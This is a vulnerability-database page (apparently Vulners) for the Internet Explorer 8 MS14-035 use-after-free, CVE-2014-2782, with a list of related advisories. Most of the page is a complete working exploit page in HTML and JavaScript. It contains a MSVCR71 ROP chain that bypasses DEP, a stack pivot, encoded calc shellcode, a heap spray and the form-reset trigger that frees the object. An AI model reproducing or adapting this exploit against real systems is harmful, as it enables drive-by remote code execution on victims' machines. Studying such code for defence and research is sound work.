Vulners
Lucene search
Internet Explorer 8 MS14-035 Use-After-Free
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | Internet Explorer 8 MS14-035 Use-After-Free Exploit | 10 Nov 201400:00 | – | zdt |
 | Microsoft Internet Explorer Use After Free (CVE-2014-2782) | 1 Dec 201400:00 | – | checkpoint_advisories |
 | CVE-2014-2782 | 19 Jun 201410:00 | – | cve |
 | CVE-2014-2782 | 19 Jun 201410:00 | – | cvelist |
 | MS14-035: Cumulative security update for Internet Explorer: June 10, 2014 | 10 Jun 201400:00 | – | mskb |
 | KLA10010 Multiple vulnerabilities at Microsoft Internet Explorer | 10 Jun 201400:00 | – | kaspersky |
 | CVE-2014-2782 | 19 Jun 201410:50 | – | nvd |
 | Memory corruption | 19 Jun 201410:50 | – | prion |
 | Microsoft Windows multiple security vulnerabilities | 21 Jul 201400:00 | – | securityvulns |
 | MS14-035: Cumulative Security Update for Internet Explorer (2969262) | 11 Jun 201400:00 | – | nessus |
10
`<!--
Exploit Title: MS14-035 Use-after-free Exploit for IE8
Date: 10 Nov 2014
Exploit Author: Ayman Sagy <[email protected]> https://www.linkedin.com/in/aymansagy
Tested on: IE8 with Java6 on Windows7
-->
<html>
<head><title>MS14-035 IE8 Use-after-free Exploit</title></head>
<body>
<!--
<APPLET id="dummy" code="dummy.class" width=100 height=100>
You need to install Java to view this page.
</APPLET>
-->
<div id="mydiv">x</div>
<form id="frm"></form>
<div id="sprayfrm"></div>
<script type="text/javascript">
spraysize = 5000;
sprayelement = document.getElementById("sprayfrm");
sprayelement.style.cssText = "display:none";
var data;
offset = 0x506;
buffer = unescape("%u2020%u2020");
pivot = unescape("%u8b05%u7c34"); // stack pivot
// MSVCR71
rop = unescape("%u4cc1%u7c34"); // pop eax;ret;
rop += unescape("%u10c2%u7c34"); // pop ecx;pop ecx;ret;
rop += unescape("%u2462%u7c34"); // xor chain; call eax {0x7C3410C2}
rop += unescape("%uc510%u7c38"); // writeable loc for lpflOldProtect
rop += unescape("%u5645%u7c36"); // pop esi;ret;
rop += unescape("%u5243%u7c34"); // ret;
rop += unescape("%u8f46%u7c34"); // pop ebp;ret;
rop += unescape("%u87ec%u7c34"); // call eax;
rop += unescape("%u4cc1%u7c34"); // pop eax;ret;
rop += unescape("%ufdff%uffff"); // {size}
rop += unescape("%ud749%u7c34"); // neg eax;ret; {adjust size}
rop += unescape("%u58aa%u7c34"); // add ebx, eax;ret; {size into ebx}
rop += unescape("%u39fa%u7c34"); // pop edx;ret;
rop += unescape("%uffc0%uffff"); // {flag}
rop += unescape("%u1eb1%u7c35"); // neg edx;ret; {adjust flag}
rop += unescape("%u4648%u7c35"); // pop edi;ret;
rop += unescape("%u30ea%u7c35"); // mov eax,[eax];ret;
rop += unescape("%u4cc1%u7c34"); // pop eax;ret;
rop += unescape("%ua181%u7c37"); // (VP RVA + 30 - {0xEF adjustment}
rop += unescape("%u5aeb%u7c35"); // sub eax,30;ret;
rop += unescape("%u8c81%u7c37"); // pushad; add al,0xef; ret;
rop += unescape("%u683f%u7c36"); // push esp;ret;
rop += unescape("%ubc90%u1010%u1010"); // NOP / MOV ESP,0x10101010
// calc
shellcode = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u16ba%u3d14%uddf0%ud9c2%u2474%u5ff4%uc929%u32b1%u5731%u0312%u1257%uf983%udfe8%uf905%ua9f9%u01e6%uc9fa%ue46f%udbcb%u6d14%uec79%u235f%u8772%ud732%ue501%ud89a%u40a2%ud7fd%u6533%ubbc1%ue7f0%uc1bd%uc824%u0afc%u0939%u7638%u5bb2%ufd91%u4c61%u4396%u6dba%uc878%u1582%u0efd%uac76%u5efc%ubb27%u46b7%ue343%u7767%uf780%u3e54%uccad%uc12f%u1d67%uf0cf%uf247%u3dee%u0a4a%uf936%u79b5%ufa4c%u7a48%u8197%u0f96%u210a%ub75c%ud0ee%u2eb1%ude64%u247e%uc222%ue981%ufe58%u0c0a%u778f%u2b48%udc0b%u520a%ub80a%u6bfd%u644c%uc9a1%u8606%u68b6%ucc45%uf849%ua9f3%u024a%u99fc%u3322%u7677%ucc34%u3352%u86ca%u15ff%u4f43%u246a%u700e%u6a40%uf337%u1261%uebcc%u1703%uab88%u65f8%u5981%udaff%u4ba2%ubd9c%u1730%u4163");
/*
_______0x1cc_____
| |
\|/ |
Junk ROP Shellcode Pivot Junk
2 3 1
*/
while (buffer.length < (offset - 0x1cc/2)) buffer += unescape("%u4cc2%u7c34");
buffer += rop;
buffer += shellcode;
while (buffer.length < offset) buffer += unescape("%u4cc2%u7c34");
while (buffer.length < 0x1000) buffer += buffer;
data = buffer.substring(0,offset) + pivot + rop + shellcode
data += buffer.substring(0,0x800-offset-rop.length-shellcode.length-pivot.length);
while (data.length < 0x80000) data += data;
for (var i = 0; i < 0x450; i++) // payload heap spray with corelanc0d3r's DEPS
{
var obj = document.createElement("button");
obj.title = data.substring(0,0x40000-0x58);
//obj.style.fontFamily = data.substring(0,0x40000-0x58);
sprayelement.appendChild(obj);
}
block = unescape( // Literal string to avoid heap allocation
"%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+
"%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+
"%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+
"%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca"+
"%u9860%u06ca%u9860%u06ca%u9860%u06ca%u9860%u06ca");
blocks = new Array();
for (i = 0; i < spraysize; i++) { // spray 1
blocks.push(document.createElement("button"));
blocks[i].setAttribute("title",block.substring(0, block.length));
sprayelement.appendChild(blocks[i]);
}
for (i = spraysize/2; i < spraysize; i++) { // free some blocks
blocks[i].setAttribute("title","");
}
var newdiv = document.createElement('div');
newdiv.innerHTML = "<textarea id='CTextArea'></textarea>";
document.getElementById("frm").appendChild(newdiv);
var newdiv2 = document.createElement('div');
newdiv2.innerHTML = "<input id='CInput' type='checkbox' onpropertychange='crash()'></input>";
document.getElementById("frm").appendChild(newdiv2);
document.getElementById("CInput").checked = true;
trigger = true;
document.getElementById("frm").reset();
function crash() {
if (trigger) {
document.getElementById("frm").innerHTML = ""; // Free object, trigger bug
CollectGarbage();
for (i = spraysize/2; i < spraysize; i++) { // spray 2
blocks[i].setAttribute("title",block.substring(0, block.length));
}
}
}
</script>
</body>
</html>
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Nov 2014 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.42356